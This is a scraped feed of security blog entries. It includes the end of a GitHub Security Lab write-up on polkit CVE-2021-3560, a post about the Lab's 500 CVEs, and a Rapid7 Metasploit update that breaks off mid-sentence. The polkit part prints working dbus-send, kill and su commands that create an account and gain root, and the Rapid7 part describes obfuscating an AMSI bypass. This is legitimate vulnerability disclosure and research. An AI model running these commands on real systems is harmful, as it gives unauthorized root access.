$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB\n\nNow you just have to do the same trick again, except this time call the `SetPassword` D-Bus method:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!\n\nAgain, you might need to experiment with the length of the delay and run it several times until it succeeds. Also, note that you need to paste in the correct user identifier (UID), which is \u201c1002\u201d in this example, plus the password hash from the `openssl` command.\n\nNow you can login as boris and become root:\n \n \n su - boris # password: iaminvincible!\n sudo su # password: iaminvincible!\n\n\n\n## polkit architecture\n\nTo help explain the vulnerability, here\u2019s a diagram of the five main processes involved during the `dbus-send` command:\n\n\n\nThe two processes above the dashed line--`dbus-send` and the authentication agent--are unprivileged user processes. Those below the line are privileged system processes. In the center is `dbus-daemon`, which handles all of the communication: the other four processes communicate with each other by sending D-Bus messages.\n\n`dbus-daemon` plays a very important role in the security of polkit, because it enables the four processes to communicate securely and check each other\u2019s credentials. For example, when the authentication agent sends an authentication cookie to polkit, it does so by sending it to the `org.freedesktop.PolicyKit1` D-Bus address. Since that address is only allowed to be registered by a root process, there is no risk of an unprivileged process intercepting messages. `dbus-daemon` also assigns every connection a \u201cunique bus name:\u201d typically something like &quot;:1.96&quot;. It\u2019s a bit like a process identifier (PID), except without being vulnerable to [PID recycling attacks](<https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790/>). Unique bus names are currently chosen from a 64-bit range, so there\u2019s no risk of a vulnerability caused by a name being reused.\n\nThis is the sequence of events:\n\n 1. `dbus-send` asks `accounts-daemon` to create a new user.\n 2. `accounts-daemon` receives the D-Bus message from `dbus-send`. The message includes the unique bus name of the sender. Let\u2019s assume it\u2019s &quot;:1.96&quot;. This name is attached to the message by `dbus-daemon` and cannot be forged.\n 3. `accounts-daemon` asks polkit if connection :1.96 is authorized to create a new user.\n 4. polkit asks `dbus-daemon` for the UID of connection :1.96.\n 5. If the UID of connection :1.96 is \u201c0,\u201d then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.\n 6. The authentication agent opens a dialog box to get the password from the user.\n 7. The authentication agent sends the password to polkit.\n 8. polkit sends a \u201cyes\u201d reply back to `accounts-daemon`.\n 9. `accounts-daemon` creates the new user account.\n\n## The vulnerability\n\nWhy does killing the `dbus-send` command cause an authentication bypass? The vulnerability is in step four of the sequence of events listed above. What happens if polkit asks `dbus-daemon` for the UID of connection :1.96, but connection :1.96 no longer exists? `dbus-daemon` handles that situation correctly and returns an error. But it turns out that polkit does not handle that error correctly. In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0. In other words, it immediately authorizes the request because it thinks the request has come from a root process.\n\nWhy is the timing of the vulnerability non-deterministic? It turns out that polkit asks `dbus-daemon` for the UID of the requesting process multiple times, on different codepaths. Most of those codepaths handle the error correctly, but one of them doesn\u2019t. If you kill the `dbus-send` command early, it\u2019s handled by one of the correct codepaths and the request is rejected. To trigger the vulnerable codepath, you have to disconnect at just the right moment. And because there are multiple processes involved, the timing of that \u201cright moment\u201d varies from one run to the next. That\u2019s why it usually takes a few tries for the exploit to succeed. I\u2019d guess it\u2019s also the reason why the bug wasn\u2019t previously discovered. If you could trigger the vulnerability by killing the `dbus-send` command immediately, then I expect it would have been discovered a long time ago, because that\u2019s a much more obvious thing to test for.\n\nThe function which asks `dbus-daemon` for the UID of the requesting connection is named [`polkit_system_bus_name_get_creds_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/bfa5036bfb93582c5a87c44b847957479d911e38/src/polkit/polkitsystembusname.c#L388>):\n \n \n static gboolean\n polkit_system_bus_name_get_creds_sync (\n PolkitSystemBusName *system_bus_name,\n guint32 *out_uid,\n guint32 *out_pid,\n GCancellable *cancellable,\n GError **error)\n\nThe behavior of [`polkit_system_bus_name_get_creds_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388>) is strange, because when an error occurs, the function sets the error parameter but still returns `TRUE`. It wasn\u2019t clear to me, when I wrote my [bug report](<https://gitlab.freedesktop.org/polkit/polkit/-/issues/140>), whether that was a bug or a deliberate design choice. (It turns out that it was a bug, because the polkit developers have [fixed the vulnerability](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81>) by returning `FALSE` on error.) My uncertainty arose from the fact that _almost all_ the callers of `polkit_system_bus_name_get_creds_sync` don\u2019t just check the Boolean result, but also check that the error value is still `NULL` before proceeding. The cause of the vulnerability was that the error value wasn\u2019t checked in the following stack trace:\n \n \n 0 in polkit_system_bus_name_get_creds_sync of [polkitsystembusname.c:388](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388>)\n 1 in polkit_system_bus_name_get_user_sync of [polkitsystembusname.c:511](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L511>)\n 2 in polkit_backend_session_monitor_get_user_for_subject of [polkitbackendsessionmonitor-systemd.c:303](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendsessionmonitor-systemd.c#L303>)\n 3 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1121](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>)\n 4 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227>)\n 5 in polkit_backend_interactive_authority_check_authorization of [polkitbackendinteractiveauthority.c:981](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L981>)\n 6 in polkit_backend_authority_check_authorization of [polkitbackendauthority.c:227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L227>)\n 7 in server_handle_check_authorization of [polkitbackendauthority.c:790](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L790>)\n 7 in server_handle_method_call of [polkitbackendauthority.c:1272](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L1272>)\n\nThe bug is in this snippet of code in [`check_authorization_sync`](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>):\n \n \n /* every subject has a user; this is supplied by the client, so we rely\n * on the caller to validate its acceptability. */\n user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,\n subject, NULL,\n error);\n if (user_of_subject == NULL)\n goto out;\n \n /* special case: uid 0, root, is _always_ authorized for anything */\n if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0)\n {\n result = polkit_authorization_result_new (TRUE, FALSE, NULL);\n goto out;\n }\n\nNotice that the value of `error` is not checked.\n\n## `org.freedesktop.policykit.imply` annotations\n\nI mentioned earlier that my PoC depends on `gnome-control-center` being installed, in addition to `accountsservice`. Why is that? The PoC doesn\u2019t use `gnome-control-center` in any visible way, and I didn\u2019t even realize that I was depending on it when I wrote the PoC! In fact, I only found out because the Red Hat security team couldn\u2019t reproduce my PoC on RHEL. When I tried it for myself on a RHEL 8.4 VM, I also found that the PoC didn\u2019t work. That was puzzling, because it was working beautifully on Fedora 32 and CentOS Stream. The crucial difference, it turned out, was that my RHEL VM was a non-graphical server with no GNOME installed. So why does that matter? The answer is `policykit.imply` annotations.\n\nSome polkit actions are essentially equivalent to each other, so if one has already been authorized then it makes sense to silently authorize the other. The GNOME settings dialog is a good example:\n\n\n\nAfter you\u2019ve clicked the \u201cUnlock\u201d button and entered your password, you can do things like adding a new user account without having to authenticate a second time. That\u2019s handled by a `policykit.imply` annotation, which is defined in this [config file](<https://gitlab.gnome.org/GNOME/gnome-control-center/-/blob/54eb734eaaa95807dd805fbe4e4ad0dceb787736/panels/user-accounts/org.gnome.controlcenter.user-accounts.policy.in>):\n \n \n /usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy\n\nThe config file contains the following implication:\n\n\n\nIn other words, if you\u2019re authorized to perform `controlcenter` admin actions, then you\u2019re also authorized to perform `accountsservice` admin actions.\n\nWhen I attached [GDB](<https://www.gnu.org/software/gdb/>) to polkit on my RHEL VM, I found that I wasn\u2019t seeing the vulnerable stack trace that I listed earlier. Notice that step four of the stack trace is a recursive call from `check_authorization_sync` to itself. That happens on [line 1227](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227>), which is where polkit checks the `policykit.imply` annotations:\n \n \n PolkitAuthorizationResult *implied_result = NULL;\n PolkitImplicitAuthorization implied_implicit_authorization;\n GError *implied_error = NULL;\n const gchar *imply_action_id;\n \n imply_action_id = polkit_action_description_get_action_id (imply_ad);\n \n /* g_debug (\"%s is implied by %s, checking\", action_id, imply_action_id); */\n implied_result = check_authorization_sync (authority, caller, subject,\n imply_action_id,\n details, flags,\n &implied;_implicit_authorization, TRUE,\n &implied;_error);\n if (implied_result != NULL)\n {\n if (polkit_authorization_result_get_is_authorized (implied_result))\n {\n g_debug (\" is authorized (implied by %s)\", imply_action_id);\n result = implied_result;\n /* cleanup */\n g_strfreev (tokens);\n goto out;\n }\n g_object_unref (implied_result);\n }\n if (implied_error != NULL)\n g_error_free (implied_error);\n\nThe authentication bypass depends on the error value getting ignored. It was ignored on [line 1121](<https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121>), but it\u2019s still stored in the `error` parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named `implied_error`, which is ignored when `implied_result` isn\u2019t null. That\u2019s the crucial step that makes the bypass possible.\n\nTo sum up, the authentication bypass only works on polkit actions that are implied by another polkit action. That\u2019s why my PoC only works if gnome-`control-center` is installed: it adds the `policykit.imply` annotation that enables me to target `accountsservice`. That does not mean that RHEL is safe from this vulnerability, though. Another attack vector for the vulnerability is [`packagekit`](<https://packagekit.freedesktop.org/>), which is installed by default on RHEL and has a suitable `policykit.imply` annotation for the `package-install` action. `packagekit` is used to install packages, so it can be exploited to install `gnome-control-center`, after which the rest of the exploit works as before.\n\n## Conclusion\n\nCVE-2021-3560 enables an unprivileged local attacker to gain root privileges. It\u2019s very simple and quick to exploit, so it\u2019s important that you update your Linux installations as soon as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.\n\nAnd if you like nerding out about security vulnerabilities (and how to fix them) check out some of the other work that the [Security Lab](<https://securitylab.github.com/>) team is doing or follow us on [Twitter](<https://twitter.com/GHSecurityLab>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-06-10T16:00:52", "type": "github", "title": "Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15790", "CVE-2021-3560"], "modified": "2021-06-10T23:45:05", "id": "GITHUB:D8A86B15D051270840BFEF47E7434ED2", "href": "https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-22T05:21:35", "description": "When I stepped onto the scale this morning, I remembered that there are some numbers that feel awkward to celebrate, while perhaps some others are worth celebrating! Recently, the GitHub Security Lab passed the milestone of 500 CVEs disclosed to open source projects. What\u2019s a CVE? In short, it\u2019s the record of a security vulnerability, under the [CVE](<https://www.cve.org/About/Overview>) program, intended to inform impacted users. So, finding more vulnerabilities in open source shouldn\u2019t be good news, right? Even as developer communities are getting better at [keeping themselves secure](<https://octoverse.github.com/2022/developer-community>), security issues may still slip through their defenses. This means that there will always be a need for security researchers, like the Security Lab, to discover and help fix them.\n\nIf you\u2019re not familiar with the Security Lab, we\u2019re a team of security experts who work with the broader open source community to help fix security issues in their projects, with the goal of improving the overall security posture of open source. Our core activity is to audit open source projects, [not only the ones hosted on GitHub](<https://twitter.com/zemarmot/status/1681008991663423489>)\u2013and help their maintainers fix the vulnerabilities we find, for free. This research is foundational for our other activities, such as [education](<http://gh.io/securecodegame>), improvement of our open source [static analysis rules](<http://gh.io/codeql-wall-of-fame>), and [tooling](<https://github.blog/2023-06-26-new-tool-to-secure-your-github-actions/>). And now we are celebrating more than 500 CVEs disclosed. \n\n## How did we get here?[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#how-did-we-get-here>)\n\nThe history of the Security Lab dates back to Semmle, the company that created CodeQL, and which was later acquired by GitHub. 2017 was a pivotal year, as we realized how powerful our product could be for finding security vulnerabilities. Unlike many other static analysis tools, CodeQL efficiently codifies insecure patterns and responds urgently to new security threats at scale. To showcase this capability, Semmle created a small security research team who used CodeQL to search for vulnerabilities in open source projects, and a web portal named LGTM.com where all open source projects could run CodeQL for free and be alerted of potential security flaws directly within their pull requests. This approach grew into an important company objective: find and fix vulnerabilities at scale in open source. This was a way of giving back to the open source community, just like any software company should.\n\n\n\nIn September 2019, [GitHub acquired Semmle](<https://github.blog/2019-09-18-github-welcomes-semmle/>), providing an ideal home for advancing the goal of improving open source security at scale. This led to the creation of the Security Lab, with a larger team and new initiatives, including curating the [GitHub Advisory Database](<https://github.com/advisories>). The GitHub Advisory Database provides developers with the most accurate information about known security issues in their open source dependencies. GitHub also incorporated CodeQL as a foundation of code scanning and a core pillar of GitHub Advanced Security (GHAS), keeping it free for open source. Code scanning [reached parity with LGTM.com in 2022](<https://github.blog/2022-08-15-the-next-step-for-lgtm-com-github-code-scanning/>).\n\nWe have also expanded beyond CodeQL and now use a variety of tools in our audit activities, such as fuzzing. But CodeQL remains one of the most effective tools in our toolbox, because it enables us to conduct [variant analysis at scale](<https://github.blog/2023-03-09-multi-repository-variant-analysis-a-powerful-new-way-to-perform-security-research-across-github/>), and allows us to share our knowledge of insecure patterns with the community, in the form of executable CodeQL queries.\n\n## The secret? Our maintainers-first approach[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#the-secret-our-maintainers-first-approach>)\n\nNot all reports get a CVE. CVE records are useful for informing downstream consumers, so when there is no downstream consumer, there is no need for a CVE. For example, a vulnerability in a CI workflow, or a vulnerability discovered in a development branch and fixed before it reached any release does not require a CVE. While we are credited for 500 CVEs, we have actually reported and helped fix over 1,000 vulnerabilities. But who&#x27;s counting, right?\n\nThat said, what matters most to us is our fix rate. When looking at the tens of thousands of reports in the GitHub Advisory Database, on average, 80% are fixed by maintainers. However, the fix rate for vulnerabilities the Security Lab reported is much higher: 96% of our reports end up with a fix. This reflects the validity of our reports and our effective collaboration with maintainers. We want project maintainers to succeed, and because of that, we are flexible on the disclosure timeline\u2013when it\u2019s safe for the rest of the community\u2013we provide fix suggestions, and we always help test the new release. Our [report template is open source](<https://github.com/github/securitylab/blob/main/docs/report-template.md>) for all security researchers who would like to use it as an inspiration for their own reports.\n\nNow, let\u2019s take a look at some vulnerabilities that stand out!!\n\n## Highlights from our first 500[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#highlights-from-our-first-500>)\n\n### [CVE-2017-9805](<https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/>): Remote Code Execution vulnerability in Apache Struts[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2017-9805-remote-code-execution-vulnerability-in-apache-struts>)\n\nThe bug that started it all. Man Yue Mo found an unsafe deserialization vulnerability in Apache Struts, which enabled an unauthenticated remote attacker to execute arbitrary code. Apache Struts was already in the news at the time, because an older vulnerability\u2014[CVE-2017-5638](<https://github.com/advisories/GHSA-j77q-2qqg-6989>)\u2014had been leveraged in the [Equifax breach](<https://arstechnica.com/information-technology/2017/09/massive-equifax-breach-caused-by-failure-to-patch-two-month-old-bug/>). Mo, who at the time was still working on Semmle\u2019s data science team, found the bug by tweaking the CodeQL query for unsafe deserialization.\n\n> This is the starting point for me personally. I came across this without realizing its significance when looking at the unsafe deserialization sinks. This bug helped us realize the power of CodeQL and understand how it can be used to find serious vulnerabilities that are otherwise hard to find, by customizing its dataflow sources, sinks, and steps.\n\n\\- Man Yue Mo, @m-y-mo\n\n### [CVE-2018-4407](<https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/>): Kernel crash caused by out-of-bounds write in Apple&#x27;s ICMP packet-handling code[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2018-4407-kernel-crash-caused-by-out-of-bounds-write-in-apples-icmp-packet-handling-code>)\n\nBy exploiting an integer overflow in the [XNU](<https://en.wikipedia.org/wiki/XNU>) kernel\u2019s networking code, a malicious TCP packet could trigger an out-of-bounds memory access, which would instantly crash the macOS kernel ([video](<https://twitter.com/kevin_backhouse/status/1057352656560287746>)) and reboot any Mac or iOS device on the same network as the attacker, without user interaction. It even had a [tweetable poc](<https://twitter.com/ihackbanme/status/1057811965945376768>).\n\n> We recorded the video of the poc in our Oxford office. I modified the poc so that it could crash multiple devices simultaneously, but I made a mistake and accidentally broadcast it to the whole office, crashing all the Macs and iPhones in the office that day! People on the other floors had no idea what had happened. \n\n\\- Kevin Backhouse, @kevinbackhouse\n\n### [GHSL-2020-204](<https://securitylab.github.com/research/securing-the-fight-against-covid19-through-oss/>): Remote Code Execution in Corona Warn App Server[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#ghsl-2020-204-remote-code-execution-in-corona-warn-app-server>)\n\nA Remote Code Execution (RCE) vulnerability was found in the German application used to track COVID contacts. An unauthenticated attacker would have been able to able to fully compromise the server where citizens were sending their anonymous infection information to facilitate the tracking of the exposure of other German citizens.This is a good example of a vulnerability that did not require a CVE since the CWA app was only used and deployed by the German and Belgian governments.\n\n> This was a novel vulnerability category we found at the Security Lab. I was researching how certain data validators, in theory used to make sure that untrusted data conformed to safe patterns, could actually be abused for the opposite purpose, and actually make the application vulnerable to a different type of attack. This research led to the publication of the Bean Stalking: Growing Java beans into RCE article and soon after we found many applications vulnerable to this vulnerability, including the Corona Warn App which we promptly reported to the maintainers.\n\n\\- Alvaro Mu\u00f1oz, @pwntester\n\n### [CVE-2021-3560](<https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/>): Privilege escalation with polkit[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2021-3560-privilege-escalation-with-polkit>)\n\npolkit is a system service installed by default on many Linux distributions, including popular distributions such as RHEL and Ubuntu. A race condition vulnerability in this library enabled an unprivileged local user to get a root shell on Linux systems. The bug was in error handling code, and could be triggered by disconnecting the client too early.\n\n> Local privilege escalation vulnerabilities on Linux are often in the kernel and require some tricky code to exploit. This bug was different because it was very easy to exploit by running a few commands in the terminal.\n\n\\- Kevin Backhouse, @kevinbackhouse\n\n### [CVE-2021-45046](<https://logging.apache.org/log4j/2.x/security.html>): Bypass of initial mitigations for Log4Shell[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2021-45046-bypass-of-initial-mitigations-for-log4shell>)\n\nDecember 2021 may be remembered by Java developers and security folks for a RCE vulnerability found in the popular Log4J logging library. The Java world faltered with what was probably the worst vulnerability ever affecting the Java ecosystem. The Apache maintainers quickly published a patch for it; however, our researchers found that the fix was not sufficient and reported a bypass affecting certain OSes to the maintainers.\n\n> Having researched and published how JNDI injections could lead to RCE back in 2016 at the BlackHat security conference, I was shocked that such a vulnerability was hidden in plain sight for so long affecting probably the most popular Java logging library. It made me realize how separated the developers and security researchers worlds actually are and how important it is to close this gap in order to build secure software.\n\n\\- Alvaro Mu\u00f1oz, @pwntester\n\n### Multiple script injections and \u201c[pwn request](<https://securitylab.github.com/research/github-actions-preventing-pwn-requests/>)\u201d vulnerabilities in implementations of GitHub Actions workflows[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#multiple-script-injections-and-pwn-request-vulnerabilities-in-implementations-of-github-actions-workflows>)\n\nWe noticed emerging insecure patterns in the implementation of GitHub Actions and helped fix more than a hundred instances in open source projects. We also published [guidelines](<https://securitylab.github.com/research/github-actions-building-blocks/>) and [CodeQL queries](<https://docs.github.com/code-security/code-scanning/introduction-to-code-scanning/about-code-scanning>) to find these types of vulnerabilities, and an [open source tool](<https://github.blog/2023-06-26-new-tool-to-secure-your-github-actions/>) that helps users set the right permissions for the tokens used in these pipelines to limit the damage in case of an exploit. Since the vulnerabilities were in the implementation of CI/CD pipelines the reports didn\u2019t get CVEs assigned as no immediate action was needed by the open source projects\u2019 users once they were fixed.\n\n> One pattern, which we coined as \u2018pwn request\u2019 was especially interesting because it was a combination of two unrelated features. When used together it led to a vulnerability.\n\n\\- Jaroslav Loba\u010devski, @jarlob\n\n### [CVE-2022-20186](<https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/>): Privilege escalation in Arm Mali GPU[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2022-20186-privilege-escalation-in-arm-mali-gpu>)\n\nThis one is a vulnerability in the Arm Mali GPU kernel driver that can be used to gain arbitrary kernel memory access from an untrusted app on a Pixel 6, to eventually gain root privileges and disable SELinux.\n\n> This bug somewhat kicked off a series of powerful bugs that exploited the memory management code in the Arm Mali GPU, which provided a very reliable and simple way to exploit the kernel, despite all the mitigations that were introduced in recent years.\n\n\\- Man Yue Mo, @m-y-mo\n\n## The road to the next 500 CVEs[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#the-road-to-the-next-500-cves>)\n\nWith the continuous improvements of CodeQL, and the ongoing modeling of new frameworks, [turbo charged by the use of Large Language Models](<https://github.blog/2023-09-12-codeql-team-uses-ai-to-power-vulnerability-detection-in-code/>) (LLMs), we are disclosing vulnerabilities faster and at a larger scale than ever before. It won\u2019t be long until we write again to celebrate the next 500 CVEs.\n\nOur dream, however, is to reach a point where the impact of the education and protection efforts\u2013from us and the community at large\u2013will balance this audit and disclosure activity, and result in finding less vulnerabilities in open source code. For example, because CodeQL is available for all projects via code scanning, any improvement will help us find more issues, but on the other hand an increased use of code scanning will prevent these issues from happening in the first place.\n\nBut we cannot do that alone. We need all of you.\n\n## Assemble! Securing open source is a team effort\n\nWith [CodeQL](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/codeql.com>) and[ multi-repository variant analysis](<https://codeql.github.com/docs/codeql-for-visual-studio-code/running-codeql-queries-at-scale-with-mrva/>), you can multiply your audit\u2019s impact by coding an insecure pattern and finding all occurrences in your code portfolio\u2013we know that bugs are often copy/pasted throughout projects. You can also multiply your impact by contributing your CodeQL queries back to the open source repository, and sharing them with the community, to find and fix even more occurrences, and protect many projects\u2013as well as the open source software supply chain.\n\nIf you maintain an open source project you can enable [code scanning](<https://docs.github.com/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning>) and [Dependabot](<https://docs.github.com/code-security/dependabot/dependabot-alerts/configuring-dependabot-alerts>) for free to immediately benefit from this security knowledge as a first line of defense. I encourage you to also [enable private vulnerability reporting](<https://docs.github.com/code-security/security-advisories/working-with-repository-security-advisories/configuring-private-vulnerability-reporting-for-a-repository>) so that teams like the Security Lab, who audit open source projects, can report issues to you privately to collaborate on a fix.\n\n* * *\n\n#### References[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#references>)\n\n * Man Yue Mo ([@m-y-mo](<https://github.com/m-y-mo>))\n * Kevin Backhouse ([@kevinbackhouse](<https://github.com/kevinbackhouse>))\n * Alvaro Mu\u00f1oz ([@pwntester](<https://github.com/pwntester>))\n * Jaroslav Loba\u010devski ([@jarlob](<https://github.com/jarlob>))\n * [Bean Stalking: Growing Java beans into RCE](<https://securitylab.github.com/research/bean-validation-RCE/>)\n * Alvaro Mu\u00f1oz at BlackHat 2016: [A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dreamland](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf>)\n\nThe post [The GitHub Security Lab\u2019s journey to disclosing 500 CVEs in open source projects](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/>) appeared first on [The GitHub Blog](<https://github.blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T20:56:46", "type": "github", "title": "The GitHub Security Lab\u2019s journey to disclosing 500 CVEs in open source projects", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-4407", "CVE-2021-3560", "CVE-2021-45046", "CVE-2022-20186"], "modified": "2023-09-21T21:00:07", "id": "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007", "href": "https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-28T14:56:11", "description": "## Eternal Blue improvements\n\n\n\nPrior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate `ms17_010_eternalblue_win8` Python module would target Windows 8 and above.\n\nNow Metasploit provides a single Ruby exploit module `exploits/windows/smb/ms17_010_eternalblue.rb` which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.\n\n## AmSi 0BfuSc@t!on\n\nThe Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such [technique is integrated](<https://github.com/rapid7/rex-powershell/blob/335b0eb2e32625d12fd58a1b1a569b0068ddb435/lib/rex/powershell/psh_methods.rb#L93>) directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as `amsiInitFailed` as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting `Powershell::prepend_protections_bypass` to false.\n\n## VMware vCenter Server RCE\n\nOur very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the 